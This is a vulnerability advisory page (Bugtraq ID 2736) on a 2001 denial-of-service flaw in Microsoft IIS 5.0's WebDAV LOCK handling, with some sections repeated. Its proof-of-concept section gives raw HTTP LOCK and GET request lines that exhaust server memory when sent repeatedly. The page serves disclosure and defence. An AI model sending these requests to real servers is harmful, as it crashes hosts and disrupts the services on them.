IIS WebDav Lock Method Memory Leak DoS Vulnerability
BID:2736
Info
IIS WebDav Lock Method Memory Leak DoS Vulnerability
| Bugtraq ID: | 2736 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 17 2001 12:00AM |
| Updated: | May 17 2001 12:00AM |
| Credit: | Reported to bugtraq by Defcom Labs in advisory def-2001-26 dated May 17, 2001 |
| Vulnerable: |
Microsoft IIS 5.0 |
| Not Vulnerable: |
Microsoft Windows 2000 Professional SP2 |
Discussion
IIS WebDav Lock Method Memory Leak DoS Vulnerability
Microsoft IIS 5.0 is vulnerable to a denial of service attack.
A flaw in the WebDav extensions allow a remote attacker to carry out a DoS by repeatedly requesting nonexistent files via the HTTP LOCK method.
This leads to a complete consumption of memory resources, eventually crashing the host and requiring a restart.
Microsoft IIS 5.0 is vulnerable to a denial of service attack.
A flaw in the WebDav extensions allow a remote attacker to carry out a DoS by repeatedly requesting nonexistent files via the HTTP LOCK method.
This leads to a complete consumption of memory resources, eventually crashing the host and requiring a restart.
Exploit / POC
IIS WebDav Lock Method Memory Leak DoS Vulnerability
LOCK /aaaaaaaaaaaaaaaaaaaaaaaaaa.htw HTTP/1.0
One way is to combine the attack with asp executions, eg.
GET /iisstart.asp?uc=a HTTP/1.0
LOCK /aaaaaaaaaaaaaaaaaaaaaaaaaa.htw HTTP/1.0
One way is to combine the attack with asp executions, eg.
GET /iisstart.asp?uc=a HTTP/1.0
References
IIS WebDav Lock Method Memory Leak DoS Vulnerability
References:
References: